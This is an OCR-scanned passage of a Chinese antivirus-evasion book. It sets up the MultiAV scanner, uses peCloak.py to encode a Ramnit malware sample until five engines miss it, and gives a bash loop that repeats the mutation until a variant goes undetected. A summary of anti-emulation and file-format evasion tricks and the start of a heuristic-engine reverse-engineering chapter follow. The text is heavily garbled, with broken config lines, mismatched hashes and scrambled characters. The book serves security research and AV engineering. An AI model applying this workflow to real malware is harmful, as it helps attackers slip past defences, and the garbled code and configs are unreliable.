我 们 需要 一 个 有 效 的 电子 邮件 账号 来 接收 激活 码 。 使 用 root 权 限 编 辑 文件 /etc/zav/zavd.conf 
并 修改 配置 文件 中 的 UPDATE_KEY， 向 其 中 添加 激活 码 。 然 后 ， 执 行 以 下 命令 以 更 新 病毒 特征 数 
据 库 ， 重 启 后 台 进 程 。 


$ sudo /etc/init.d/zavd update 

02/06/15 12:45:54 [zavdupd]: INFO: ZAVd Updater starting ... 
02/06/15 12:46:00 zavdupd]: INFO: Succesfully updated ZAV database and ZAVCore engine 
Informing ZAVd about pending updates 

$ sudo /etc/init.d/zavd restart 

Stopping Zoner AntiVirus daemon 

02/06/15 12:46:52 [zavd]: INFO: Sending SIGTERM to 16863 

02/06/15 12:46:52 [zavd]: INFO: ZAVd successfully terminated 
Starting Zoner AntiVirus daemon 

02/06/15 12:46:52 [zavd]: INFO: Starting ZAVd in the background... 
02/06/15 12:46:53 [zavd]: INFO: ZAVd successfully started 

$ zavcli ../malware/eicar.com.txt 

../malware/eicar.com.txt: INFECTED [EICAR.Test.File-NoVirus] 


这 样 ， 所 有 需要 用 到 的 反 病 毒 产品 就 全 部 安装 完成 了 。 接 下 来 需要 对 之 前 下 载 的 MultiAV 客 
户 端 进行 配置 。 























8.2.2 MultiAV 配置 


MultiAV 程 序 使 用 一 套 彼此 兼容 的 反 病毒 产品 ( 撰写 本 书 时 共 15 个 反 病毒 产品 ) 这 些 产 品 能 
通过 编辑 config.cfg 文 件 进行 配置 。 在 本 例 中 , 配置 过 程 十 分 容易 : 禁用 不 需要 使 用 的 反 病 毒 产品 。 
禁用 反 病 毒 引 擎 〈 比 如 ，ESET Nod32 )， 只 需要 像 下 面 这 样 在 配置 文件 中 对 应 反 病 毒 产品 部 分 添 
加 粗 体 部 分 的 代码 : 
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[ESET] 
PATH=/opt/eset/esets/sbin/esets_scan 
ARGUMENTS=--clean-mode=NONE --no-log-all 
DISABLED=1 
BE 


除了 之 前 下 载 并 配置 好 的 Avast、AVG 、ClamAV 、Comodo 、F-Prot 和 Zoner 以 外 ,这 里 还 需要 
禁用 其 他 所 有 反 病 毒 产 品 。 完 整 的 配置 文件 如 下 所 示 : 


ClamAV 
UNIX SOCKET-/var/run/clamav/clamd.ctl 





F-Prot 
PATH- /usr/local/bin/fpscan 
ARGUMENTS--r -v 0 








Comodo 
PATH-/opt/COMODO/mycmdscan 
ARGUMENTS--s $FILE -v 


[ESET] 
PATH-/opt/eset/esets/sbin/esets scan 
ARGUMENTS---clean-mode-zNONE --no-log-all 
DISABLED-Y 


[Avira] 
PATH-/usr/lib/AntiVir/guard/scancl 
ARGUMENTS---quarantine-/tmp -z -a --showall --heurlevel-3 
DISABLED-Y 


[BitDefender] 
PATH-/opt/BitDefender-scanner/bin/bdscan 
ARGUMENTS---no-list 
DISABLED-Y 


[Sophos] 
PATH-/usr/local/bin/sweep 
ARGUMENTS--archive -ss 
DISABLED-Y 


[Avast] 
PATH-/bin/scan 
ARGUMENTS--f 


[AVG] 
PATH-/usr/bin/avgscan 
ARGUMENTS--j -a --ignerrors 


[DrWeb] 
PATH-/opt/drweb/drweb 
ARGUMENTS- 

DISABLED-Y 


[McAfee] 
PATH-/usr/local/uvscan 
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ARGUMENTS---ASCII --ANALYZE --MANALYZE  --MACRO-HEURISTICS --RECURSIVE --UNZIP 
DISABLED-Y 


# Ikarus is supported in Linux running it with wine (and it works great) 
[Ikarus] 

PATH-/usr/bin/wine 

ARGUMENTS-/path/to/ikarus/T3Scan.exe -sa 

DISABLED-1 


[F-Secure] 

PATH-/usr/bin/fsav 
ARGUMENTS---actioni-none --action2-none 
DISABLED-1 


[Kaspersky] 

# Works at least in MacOSX 
PATH-/usr/bin/kav 
ARGUMENTS-scan $FILE -i0 -fa 
DISABLED-1 





[ZAV] 
PATH-/usr/bin/zavcli 
ARGUMENTS---no-show-clean 


配置 完 MultiAV 后 ， 就 可 以 通过 以 下 命令 对 其 进行 测试 了 : 


$ python multiav.py /home/joxean/malware/eicar.com.txt 





('AVG': ('/home/joxean/malware/eicar.com.txt': 'EICAR Test'), 
'Avast': ('/home/joxean/malware/eicar.com.txt': 'EICAR Test-NOT virus!!!'j, 
'ClamAV': ('/home/joxean/malware/eicar.com.txt': 'Eicar-Test-Signature')], 
'Comodo': ('/home/joxean/malware/eicar.com.txt': 'Malware'], 
'F-Prot': ('/home/joxean/malware/eicar.com.txt': 'EICAR Test File (exact)'), 
'ZAV': ('/home/joxean/malware/eicar.com.txt': 'EICAR.Test.File-NoVirus')) 


扫描 结束 之 后 , 将 会 得 到 一 个 检测 报告 , 其 中 包括 了 每 一 款 反 病毒 软件 对 给 定 样本 的 分 析 结 
果 。 由 于 EICAR 样 本 理论 上 可 以 被 所 有 反 病 毒 软件 侦 测 到 ， 如 果 有 反 病 毒 软件 无 法 侦 测 该 样本 ， 
则 需要 重新 进行 设置 直到 确认 一 切 无 误 。 

下 一 步 是 运行 Web 接 口 以 及 基于 JSON 格 式 的 API。 在 multiavpy 脚 本 所 在 的 同一 个 目录 下 , 还 
有 一 个 名 为 webapi.py 的 Python 脚本 。 使 用 以 下 指令 运行 即 可 : 


$ python webapi.py 
http://0.0.0.0:8080/ 


它 会 默认 监听 8080 虚 拟 机 的 端口 。 如果 打 开 浏 览 絮 访问 对 应 地 址 , 我 们 将 会 看 到 一 个 如 图 8-5 
所 示 的 页 面 。 













Upload 





Last reports Please, select the file to upload and scan with multiple antivirus solutions. 


lft ey aai TE Seleccionar archivo | Ningun archivo seleccionado 





图 8-5”MultiAV 主 页 


我 们 可 以 使 用 上 述 页 面 来 上 传 一 个 样本 文件 , 交 给 多 个 反 病 毒 引擎 进行 扫描 分 析 。 当 所 有 扫 
描 任 务 结束 以 后 ， 页 面 会 以 表格 的 形式 展示 相关 结果 ， 如 图 8-6 所 示 。 





Scan results for 49049b1f73dee2751cf63 1c14151ebef00177b8f.fil 


Upload 


MD5:08b3543a6d0b3cabc44bb3e46942dd46 
p SHA1:49049b1f73dee2751cf631c14151ebef00177b8f. 
te pAn iki SHA256:9d3f86b42fc4595ec24c24365b4887e5ba89eaf02322bd281fbf534ef5b4b6a4 


W32/Parite.B 
Win32/Parite.B virus 
W32.Alman-2 
Win32:Parite 
Virus.Win32.Parite.b 
Win32.Parite.B 
W32/Pate.b 
Virus.Parite 
Win32.Alman.NAB 
Win32/Alman 
W32/Parite-B 

Virus. Win32.Parite.gen 


















































Kj8-6 ago SETA PT 


但 是 ， 这 里 我 们 对 Web 交 互 接口 并 不 感 兴趣 : 虽然 它 有 效 而 且 有 用 , 但 是 找到 编写 工具 需要 
使 用 到 的 API 显 得 更 为 重要 。 目 前 版 本 的 MultiAV 提 供 了 三 个 JSON 格 式 的 Web API: 
O /api/upload 上 传 文件 然后 获取 扫描 结 
Q /api/upload fast 上 传 文件 然后 仅 使 用 扫描 速度 快 的 引擎 扫描 并 返回 扫描 结 
D /api/search ”获取 之 前 已 有 的 扫描 分 析 报 告 。 

可 以 使 用 upload_ fast API 来 上 传 修改 过 的 payload。 但 要 如 何 获取 修改 过 的 payload 呢 ? 例如 ， 
在 存在 缓存 的 前 提 下 , 如 何 获取 一 个 修改 过 并 发 送 给 MultAV 的 API 进 行 扫描 的 Meterpreterpayload 
呢 ?” 这 时 候 就 需要 借助 peCloak.py 了 ， 下 一 节 将 会 详细 阐释 。 
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8.2.3 peCloak 


peCloak 原 本 是 为 了 测试 实验 绕 过 反 病毒 软件 扫描 攻 而 开发 的 。 当 然 ， 试验 结 果 非 常 成 功 : 
无 论 是 使 用 i mum 更 用 特殊 命令 行 配置 , 所 有 研究 的 反 病毒 软件 都 被 绕 过 了 。 你 可 以 通过 
以 下 链接 下 载 到 原始 工具 : http://securitysift.com/pecloak-py-an-experiment-in-av-evasion/。 

这 里 我 们 对 peCloak 的 原始 版 本 做 了 一些 改动 并 进 二 打包， 你 可 以 从 以 下 链接 下 载 修改 后 的 
新 版 本 : https://github.com/joxeankoret/tahh/tree/master/evasion。 

本 节 将 借助 peCloak 来 修改 Windows PE 文件 从 而 绕 过 反 病 毒 软 件 的 静态 扫描 侦 测 。 让 我 们 手 
动 进行 一 些 测试 。 我 们 使 用 的 病毒 样本 MD5 值 为 767d6p68dbff63f3978bec0114dq875c。 


$ md5sum ramnit 767d6b683bff63f3978bec011488875c.exe 
767d46b68dbff63f3978bec0114dd875c  ramnit 7674d6b68dbff63f3978bec01148d875c.exe 
$ /home/joxean/multiav/multiav-client.py ip-address-of-multi-av:8080 \ 

ramnit 767d6568dbff63f3978bec0114dd875c.exe -f 

Results: 

















(u'AVG': (u'/tmp/tmpEAWvFO': u'Win32/Zbot.G'), 
u'Avast': (u'/tmp/tmpEAWvFO': u'Win32:RmnDrp'), 
u'ClamAV': (u'/tmp/tmpEAWvFO': u'W32.Ramnit-1'), 


u'F-Prot': (u'/tmp/tmpEAWvFO': u'W32/Ramnit.E'), 
u'ZAV': (u'/tmp/tmpEAWvF0': u'Win32.Ramnit.H')) E 
有 五 款 反 病毒 软件 识别 出 了 该 样本 是 已 知 的 恶意 软件 。 现 在 尝试 使 用 peCloak 生 成 一 个 样本 
的 修改 版 本 : 


$ ./peCloak.py -a -o test.exe ramit_767d6b68dbff63f3978bec0114dd875c.exe 








peCloak.py (beta) 
A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool 


Author: Mike Czumak | T V3rnlx | @SecuritySift 
Usage: peCloak.py [options] [path to pe file] (-h or --help) 


ASLR not enabled 


[*] 
[*] Creating new section for code cave... 
[*] Code cave located at 0x443000 
[*] PE Section Information Summary: 
[+] Name: .text, Virtual Address: 0x1000, Virtual Size: 0x9cda, Characteristics: 

0x60000020 

[+] Name: .data, Virtual Address: 0xb000, Virtual Size: Oxcdc, Characteristics: 
0xc0000040 

[+] Name: .rsrc, Virtual Address: 0xc000, Virtual Size: 0x9128, Characteristics: 
0x40000040 


[+] Name: .text, Virtual Address: 0x16000, Virtual Size: 0x2d000, 
Characteristics: 0xe0000020 

[+] Name: .NewSec, Virtual Address: 0x43000, Virtual Size: 0x1000, 
Characteristics: 0xe00000e0 


"m 
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[*] Preserving the following entry instructions (at entry address 0x416000): 


+] pusha 
+] call 0x416006 
+] pop ebp 


+] mov eax, ebp 

[*] Generated Heuristic bypass of 3 iterations 

[*] Generated Encoder with the following instructions: 

ADD Oxcc 

XOR 0x8 

XOR 0x4b 

SUB 0x13 

SUB 0x88 

+] XOR Oxc 

] Encoding entire .text section 

] PE .text section made writeable with attribute 0xE0000020 

] Writing encoded data to file 

*] Overwriting first bytes at physical address 00025000 
t 
] 


十 十 十 十 十 








Writing code cave to file 
[+] Heuristic Bypass 
Decoder 
Saved Entry Instructions 
Jump to Restore Execution Flow 
Final Code Cave (1en-188): 


90909090909031£631£f£905231d825a404833c060 
404149424a40483df£7893120000000075ec6061 
909033c04048424a405331db5b4149434b3873dd 
160000000075e89c9d424a424a90909033c04048 
41493dea2247180000000075£09c9d9c98909090 
0060410000000000424239080300c9c9d40488000 
4048800013424a434580304504149803008606151 
c9598028cc403400304400000000007ecd909060 


[*] New file saved [test.exe] 
$ /home/joxean/multiav/multiav-client.py \ 
ip-address-of-multi-av:8080 test.exe -f 
Results: 
(u'AVG': {}, u'Avast': {}, u'ClamAV': {}, u'F-Prot': (), u'ZAV': ()) 
没有 一 款 反 病 毒 软 件 检测 到 修改 过 后 的 样本 变种 。 现 在 , 让 我 们 来 编写 一 个 自动 化 工具 来 替 
代 刚 刚 手 工 进行 的 操作 。 


8.2.4 编写 终极 工具 


本 节 将 会 介绍 如 何 结合 MultiAV 和 peCloak 编 写 自动 化 生成 绕 过 反 病 毒 软件 样本 的 工具 。 这 款 
工具 的 工作 原理 如 下 : 

(1) 传人 一 个 Windows PE 文件 样本 ; 

(2) 使 用 peCloak 对 传人 样本 文件 进行 修改 ， 使 其 能 够 绕 过 反 病 毒 软件 的 侦 测 ; 
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(3) 检查 修改 过 后 的 样本 是 否 会 被 反 病 毒 引 擎 检测 到 ; 

(4) 返回 一 个 不 会 被 侦 测 到 的 变种 样本 。 

本 节 将 会 演示 如 何 结合 peCloak py 和 MultiAV 的 命令 行 客户 端 来 编写 一 个 简单 的 命令 行 工具 。 
编写 简单 的 Shell 脚 本 十 分 容易 .MutiAV 带 有 一 个 名 为 multiav-clientpy 的 命令 行 式 Python 脚本 客户 
端 ， 用 来 发 送 恶 意 软 件 样 本 并 根据 相应 配置 使 用 不 同 的 反 病毒 引 苟 进行 扫描 。 在 手动 测试 
peCloak.py 之 前 ， 我 们 使 用 multiav-client.py。 下 面 是 一 个 使 用 了 之 前 提 到 的 命令 的 Shell 脚 本 形式 
的 自动 绕 过 样本 研究 工具 的 简化 版 本 : 


#!/bin/bash 





MULTIAV ADDR-ip-address-of-multi-av:8080 
MULTIAV PATH-/path/to/multiav 

MULTIAV TOOL-$MULTIAV PATH/multiav-client.py 
CLOAK, PATH-/path/to/peCloak.py 








if [ $48 -lt 1 ]; then 
echo "Usage: $0 «pefile»" 
exit O0 

Ei 

sample=$1 

while [ 1 

do 


echo "[+] Mutating the input PE file..." 

SCLOAK PATH -a -o test.exe $sample 

echo "[«] Testing antivirus detection..." 

if SMULTIAV TOOL S$MULTIAV ADDR test.exe -f; then 
echo "[i] Sample ‘md5sum test.exe^ undetected!" 
break 

else 
echo "[!] Sample still detected, continuing..." 

fi 

done 


脚本 运行 并 使 用 pecloak .py 处 理 传 人 的 文件 ， 对 其 进行 编码 ， 然 后 发 送 给 MultiAV 服 务 端 
测试 是 否 有 反 病 毒 引 警 能 够 侦 测 。 当 没有 一 款 反 病毒 软件 能 够 检测 出 修改 过 后 的 样本 时 , 程序 自 
动 退出 。 为 了 测试 精简 版 本 的 自动 化 绕 过 研究 工具 ， 我 们 传人 一 个 PE 文件 样本 : 

$ /path/to/multiav-client.py ip-off-multi-av:8080 * 


ramnit 767d6b68dbff63f3978bec0114dd875c.exe -f 
Results: 





(u'AVG': (u'/tmp/tmpEZnlZW': u'Win32/Zbot.G'), 

u'Avast': (u'/tmp/tmpEZnlZW': u'Win32:RmnDrp'), 

u'ClamAV': (u'/tmp/tmpEZnlZW': u'W32.Ramnit-1'), 

u'F-Prot': (u'/tmp/tmpEZnlZW': u'W32/Ramnit.E'), 

u'ZAV': (u'/tmp/tmpEZnlZW': u'Win32.Ramnit.H')) 

$ bash evasion-test.sh ramnit 767d6b568dbff63f3978bec0114dd875c.exe 
[+] Mutating the input PE file... 
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[+] Testing antivirus detection... 
Results: 


(u'AVG': {}, u'Avast': {}, u'ClamAV': {}, u'F-Prot': (2), u'ZAV': ()) 
[i] Sample ca4ae6888ec92f0a2d644b8aa5c6b249 test.exe undetected! 


可 以 发 现 ， 使 用 peCloak.py 和 MultiAV 编 写 的 简化 版 Shell 脚 本 已 经 有 足够 的 能 力 来 生成 一 个 








无 法 被 选 定 反 病毒 产品 侦 测 到 的 恶意 文件 变种 。 但 要 记 住 , 在 此 过 程 中 要 使 用 自己 的 多 反 病 毒 引 
擎 扫描 工具 ,否则 样本 会 被 发 送 给 反 病 毒 厂 商 。 接 下 来 还 可 以 做 很 多 优化 工作 。 比 如 目前 这 个 简 
化 版 的 脚本 ， 如 果 找 不 到 可 以 绕 过 反 病 毒 软件 侦 测 的 样本 时 ， 就 会 持续 循环 运行 。 另 外 ,还 可 以 
修改 脚本 使 其 能 够 支持 peCloak.py 所 有 相关 的 命令 行 选项 。 我 们 甚至 可 以 将 peCloak.py 整 合 到 
MultiAV 中 去 。 当 然 上 述 实 验 演示 内 容 ， 对 于 了 解 如 何 开发 一 个 可 以 绕 过 反 病 毒 软件 扫描 顺 的 自 
动 化 生成 工具 来 说 已 经 足够 了 。 实 验证 明 ， 要 绕 过 反 病 毒 软件 的 静态 扫描 侦 测 其 实 十 分 容易 。 








总 结 


/AN 二 口 


本 童 十 分 紧凑 充实 , 介绍 了 大 量 关 于 绕 过 反 病 毒 扫描 带 的 知识 和 方法 。 最 后 通过 实战 案例 介 


绍 了 如 何 自动 化 完成 查找 及 测试 绕 过 技术 过 程 中 所 需 的 所 有 步骤 。 





总 的 来 说 ， 本 章 曾 释 了 以 下 内 容 。 

a 绕 过 反 病 毒 扫 描 右 意味 着 绕 过 反 病 毒 特征 码 、 扫 描 引 擎 和 侦 测 逻 辑 。 

a 扫描 器 会 对 待 扫 描 的 文件 大 小 有 限制 。 例 如 ， 如 果 文 件 大 小 超过 预 设 的 相关 数值 ， 扫 描 
右 就 会 跳 过 对 该 文件 的 扫描 。 正 是 因为 存在 文件 大 小 上 限 ， 攻 击 者 可 以 通过 更 改 恶 意 软 
件 文件 大 小 至 一 个 超过 预 设 上 限 的 值 ， 来 绕 过 扫描 器 检测 。 

口 所 有 反 病 毒 软件 都 会 有 一 个 反 汇 编 分 析 模 块 ， 且 大 多 数 同 时 带 有 一 个 模拟 模块 。 当 恶意 
软件 带 有 压缩 或 混淆 的 代码 ， 反 病毒 软件 无 法 进行 静态 分 析 的 时 候 ， 恶 意 软 件 就 会 被 模 
拟 执行 分 析 。 反 病毒 软件 中 的 模拟 器 有 时 候 不 知道 如 何 正确 模拟 一 些 混淆 指令 。 攻 击 者 
可 以 使 用 带 有 类 似 混 淆 指令 的 样本 来 绕 过 侦 测 。 

口 包含 异常 数量 区 块 的 PE 文件 头 ， 尽 管 仍 然 可 以 被 操作 系统 执行 ， 但 有 可 能 会 被 反 病 毒 扫 

描 器 认为 已 损坏 ， 因 此 不 会 被 侦 测 扫描 。 

口 有 多 种 可 以 欺骗 反 病 毒 软件 内 模拟 器 的 反 模拟 器 技巧 : 用 特殊 的 方式 使 用 系统 API 并 核查 
在 模拟 器 内 和 在 系统 中 执行 结果 有 何 差异 ; 加 载 模拟 器 不 支持 或 没有 被 模拟 的 系统 库 ， 
然后 调用 这 些 库 导 出 的 函数 ; 仔细 观察 模拟 环境 下 某 些 系统 库 大 小 和 内 核 同 真实 系统 环 
境 下 有 何不 同 ; 使 用 旧 的 会 在 模拟 器 中 失效 的 DOS 设 备 名 (CON 、AUX 等 ); 同时 ,测试 
特权 指令 能 否 使 用 ， 是 否 会 触发 异常 一 一 在 真实 系统 环境 下 ， 如 果 在 用 户 态 使 用 特权 指 
令 ， 会 触发 异常 。 

口 使 用 类 似 不 常见 的 指令 前 级 和 操作 数组 合 或 未 有 文档 说 明 的 指令 ， 可 以 作为 抗 反 汇编 技 

巧 来 绕 过 侦 测 。 

口 使 用 类 似 防止 扫描 器 附加 到 恶意 软件 进程 或 读 取 进程 内 存 这 样 的 反 调 斌 技巧， 对 于 绕 过 
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口 文件 格式 混 消 或 多 重文 件 格 式 可 以 干扰 扫描 需 。 例 如 ,将 一 个 可 执行 文件 伪装 成 PDF 文件 ， 

会 让 反 病 毒 软 件 使 用 扫描 PDF 文件 格式 的 模块 去 扫描 PE 文件 ， 从 而 导致 样本 绕 过 侦 测 。 

口 Virustotal 是 一 款 允 许 上 传 文件 进行 扫描 的 在 线 服 务 。 它 会 使 用 其 支持 的 多 种 反 病 毒 引 擎 
进行 扫描 。 但 VirusTotal 的 一 个 缺点 是 所 有 上 传 的 文件 会 被 公开 。 这 会 给 研究 绕 过 反 病 毒 
软件 技术 的 过 程 带 来 麻烦 。 这 时 候 就 需要 用 到 MultiAV。 

口 MutiAV 是 一 款 类 似 VirusTotal 的 开源 工具 。 它 可 以 同时 使 用 多 款 反 病毒 引擎 扫描 文件 或 

目录 。 

口 可 以 借助 类 似 Veil Framework 的 反 病 毒 软 件 绕 过 框架 或 者 名 叫 peCloak 的 独立 PE 绕 过 脚 

本 ， 对 恶意 文件 样本 做 出 改变 使 其 不 能 被 反 病毒 软件 侦 测 到 。 

口 使 用 MultiAV 作 为 VirusTotal 的 个 人 隐私 替代 方案 , 结合 反 病毒 软件 绕 过 工具 , 我 们 可 以 自 
动 化 查找 反 病 毒 软件 扫描 需 绕 过 方式 的 过 程 。 相 关 工具 首先 创建 一 个 修改 过 后 的 样本 , 
同时 使 用 MultiAV 让 不 同 的 扫描 引 警 进行 扫描 。 修改 样本 同时 扫描 这 一 过 程 实现 自动 化 以 

后 ， 只 要 投入 足够 多 的 时 间 ， 就 一 定 能 找 出 可 以 绕 过 反 病 毒 软 件 侦 测 的 样本 。 

在 第 9 章 中 ， 我 们 将 讨论 如 何 绕 过 针对 恶意 代码 执行 过 程 中 开展 的 反 病 毒 动态 侦 测 。 
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反 病 毒 软件 中 最 常见 的 不 依赖 于 特定 特征 码 进行 检测 的 模块 是 启发 式 引 警 。 与 通用 侦 测 程序 
或 基于 特征 码 的 常见 病毒 扫描 侦 测 方案 不 同 ， 启 发 式 引 擎 依据 文件 通用 行为 作出 判断 。 

反 病 毒 软件 使 用 的 启发 式 引 警 通过 评估 样本 文件 的 行为 和 其 他 侦 测 依据 实现 病毒 侦 测 , 而 不 
是 依赖 于 特定 特征 码 扫描 侦 测 带 有 类 似 行为 特征 的 恶意 软件 及 其 变种 。 本 章 将 会 介绍 各 种 类 型 的 
局 发 式 引 擎 ,包括 和 运行 在 用 户 态 、 内 核 态 或 是 同时 运行 在 用 户 态 和 内 核 态 的 引擎 。 了 解 如 何 绕 过 
启发 式 引 擎 十 分 重要 , 因为 当前 反 病 毒 软件 会 更 多 地 基于 文件 行为 对 待 扫描 文件 做 出 检测 ， 而 不 
是 基于 特征 码 来 检测 恶意 软件 。 了 解 各 种 各 样 的 启发 式 引擎 将 会 对 绕 过 相关 侦 测 工作 大 有 帮助 。 
通过 阅读 本 章 , 反 病 毒 软件 工程 师 同样 可 以 了 解 到 攻击 者 是 如 何 绕 过 启发 式 引擎 检测 的 , 进而 改 
进 侦 测 引擎 。 


9.1 局 发 式 引 警 种 类 


启发 式 引 擎 可 分 为 三 类 : 静态 、 动 态 以 及 结合 动静 态 策略 的 混合 态 。 一 般 来 说 ,静态 启发 引 
擎 被 认为 是 真正 意义 上 的 启发 式 引 擎 ， 而 动态 启发 式 引 警 一般 被 称 作 主机 入 侵 防 御 系统 (host 
intrusion prevention system, HIPS )。 静 态 启 发 式 引 擎 通过 反 汇 编 或 筛选 分 析 文 件 头 收集 的 相关 侦 
测 信息 来 发 现 恶意 软件 。 同 样 是 基于 相应 文件 行为 ,动态 局 发 式 引 擎 通过 hook API 调 用 或 在 模拟 
框架 下 执行 程序 来 侦 测 恶意 软件 。 接 下 来 的 部 分 将 会 分 别 痢 释 不 同 种 类 的 启发 式 引 警 , 并 介绍 如 
何 绕 过 各 类 引擎 。 


9.1.1 静态 启发 式 引 擎 


静态 启发 式 引擎 依据 部 署 目标 的 不 同 ， 执 行 方式 也 有 所 不 同 。 比 如 , 一 种 常见 的 情况 是 使 用 
基于 机 咒 学 习 算法 〈 例 如 ， 贝 叶 斯 神经 网 络 算法 或 通用 学 习 算 法 ) 的 启发 式 引擎 ， 因 为 它们 需要 
针对 由 集群 工具 包 C 即 启发 式 引 擎 ) 创建 的 最 大 的 恶意 软件 家 族 ， 找 出 不 同 变种 间 的 相似 性 。 局 
发 式 引 擎 的 实验 室 开发 内 测 版 扫描 效果 相 较 于 桌面 正式 版 更 好 , 因为 内 测 版 误 报 率 高 、 内 存 资 源 
消耗 大 ， 这 对 实验 室 开发 版 来 说 是 可 接受 的 。 对 桌面 版 本 的 反 病 毒 解决 方案 来 说 ,“ 专 家 系统 ” 
是 一 个 更 好 的 选择 。 

“专家 系统 ”是 启发 式 引 擎 使 用 的 一 系列 模拟 人 工分 析 者 决策 策略 的 病毒 分 析 判 断 算 法 。 病 
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毒 分 析 员 可 以 通过 粗略 分 析 文 件 结构 并 快速 查看 文件 反 汇 编 结 果 ， 无 须 观察 文件 行为 便 可 对 可 
疑 的 PE 文件 作出 判断 。 病 毒 分 析 工 程 师 可 能 会 遇 到 以 下 问题 : 样本 文件 的 结构 不 常见 吗 ? 样本 


文件 是 否 通过 修改 PE 文件 的 





图 标 为 Windows 图 片 文件 来 欺骗 用 户 点 击 执行 





? 样本 文件 的 代码 是 


TARA? 样本 是 否 加 壳 压 缩 或 添加 了 某 些 保护 措施 ?样本 文件 是 否 采用 了 反 调 试 手段 y 如 


有 果 以 上 问题 的 答案 是 
试 着 隐藏 其 内 部 逻辑 ， 
家 系统 ”。 





9.1.2 £i 


“是 ” 





过 简单 的 静态 局 发 式 引 擎 


本 部 分 以 Comodo 反 病毒 Linux 版 本 中 十 分 简单 的 静态 启 
过 库 文 件 libHEUR.so 实 现 。 幸 运 的 是 ，libHEUR.so 库 带 有 完 


ASIE 
整 的 调试 符号 ， 





瑚 作为 案例 。 该 启发 式 引擎 通 


， 那 么 病毒 分 析 工 程 师 就 会 怀疑 样本 文件 是 恶意 软件 ， 至 少 样本 文件 
因此 需要 进 一 步 分 析 。 使 用 类 似 人 工分 析 逻 辑 的 启发 式 引 擎 


E, REE “R 














因此 我 们 通过 查找 函 


数 名 ， 即 可 找到 库 里 面 真 实 的 启发 式 引擎 代码 。 图 9-1 展 示 了 在 IDA 中 启发 式 引 擎 的 函数 列表 。 
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Function name 


CAEHeurScanner: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: ScanDualExtension(ITarget *, SCANOPTION *, SCANRESULT *) 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 
CAEHeurScanner:: 


:HasPEMagic(uchar *,uint) 






HasPEMagic(uchar *, uint) 

Init(IUnknown *,void *) 

IsFPs(ITarget *) 

IsFPs(ITarget *) 

IsInExtensionsList(char *, EXTENSION *, uint) 
IsInExtensionsList(char *, EXTENSION *, uint) 
IsResourceExistByTypelD(int) 
IsResourceExistByTypelD(int) 


:IsResourceSectionExist(void) 


IsResourceSectionExist(void) 
IsValidPtr(void *) 
IsValidPtr(void *) 
IsWhiteVersionlInfo(ITarget *) 


:IsWhiteVersionlInfo(ITarget *) 
:MatchBlackPacker(uchar *,int,PACKSIGN *, SCANRESULT *) 


Querylnterface( GUID &,void **) 


:Release(void) 


RiskFileAttribute(ITarget *, SCANOPTION *, SCANRESULT *) 
ScanCorruptPE(ITarget *, SCANOPTION *, SCANRESULT *) 
ScanCorruptPE(ITarget *, SCANOPTION *, SCANRESULT *) 


ScanDualExtension(ITarget *, SCANOPTION *, SCANRESULT *) 
ScanMultiPacked(int,ITarget *, SCANRESULT *) 
ScanMultiPacked(int,ITarget *, SCANRESULT *) 


:ScanPEBombíITarget *, SCANOPTION *, SCANRESULT *) 


ScanSingleTarget(ITarget *, SCANOPTION *, SCANRESULT *) 
ScanUnknowPackerllTarget *, SCANOPTION *, SCANRESULT *) 
ScanUnknowPacker(lTarget *, SCANOPTION *, SCANRESULT *) 
SetSignMgr(lUnknown *) 

Uninit(void *) 











该 列表 显示 , 局 发 式 引 擎 
结果 列表 中 的 VTable， 可 以 确认 ScansingleTarget 方 法 正 是 此 次 研究 绕 





图 9-1 





IDA 中 展示 的 启发 式 引 擎 函数 


背 助 C++ 类 cAEHeurSscannezr 实 现 启发 式 扫 撒 。 通 过 
过 启发 式 引 警 的 目标 : 


过 观察 IDA 反 汇编 
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.data.rel.ro:000000000021A590 ; "vtable for'CAEHeurScanner 
.data.rel.ro:000000000021A590  ZTV14CAEHeurScanner dq 0 
; DATA XREF: 


.got:. ZTV14ACAEHeurScanner,. ptr 


.data.rel.ro:000000000021A598 dq offset  ZTI14CAEHeurScanner ; 
‘typeinfo for'CAEHeurScanner 
.data.rel.ro:000000000021A5A0 dq offset 


.ZN14CAEHeurScannerl4QueryInterfaceER5 GUIDPPv ; 
CAEHeurScanner::QueryInterface( GUID &,void **) 


.data.rel.ro:000000000021A5A8 dq offset 
.ZN14CAEHeurScanner6AddRefEv ; CAEHeurScanner::AddRef (void) 
.data.rel.ro:000000000021A5B0 dq offset 


.ZN14CAEHeurScanner7ReleaseEv ; CAEHeurScanner::Release(void) 


.data.rel.ro:000000000021A5B8 dq offset  ZN14CAEHeurScannerD1Ev 








CAEHeurScanner::-CAEHeurScanner() 








.data.rel.ro:000000000021A5CO0 dq offset  ZN14CAEHeurScannerDOEv 
; CAEHeurScanner::-CAEHeurScanner() 

.data.rel.ro:000000000021A5C8 dq offset 
 ZN14CAEHeurScanner4InitEP8IUnknownPv ; CAEHeurScanner::Init(IUnknown *, 
void *) 

.data.rel.ro:000000000021A5D0 dq offset 
—ZN14CAEHeurScanner6UnInitEPv ; CAEHeurScanner::UnInit(void *) 
.data.rel.ro:000000000021A5D8 dq offset 
—ZN14CAEHeurScannerl12GetScannerIDEP10. SCANNERID ; 
CAEHeurScanner::GetScannerID(. SCANNERID *) 

.data.rel.ro:000000000021A5E0 dq offset 














 ZN14CAEHeurScannerl10SetSignMgrEP8IUnknown 
; CAEHeurScanner::SetSignMgr (IUnknown 
*) 


.data.rel.ro:000000000021A5E8 dq offset 


 ZN14CAEHeurScannerl16ScanSingleTargetEP7ITargetP11 SCANOPTIONP11. SCANRESULT ; 
CAEHeurScanner::ScanSingleTarget(ITarget *, SCANOPTION *, SCANRESULT *) 
.data.rel.ro:000000000021A5F0 dq offset 
 ZN14CAEHeurScanner4CureEPvj ; CAEHeurScanner::Cure(void *,uint) 


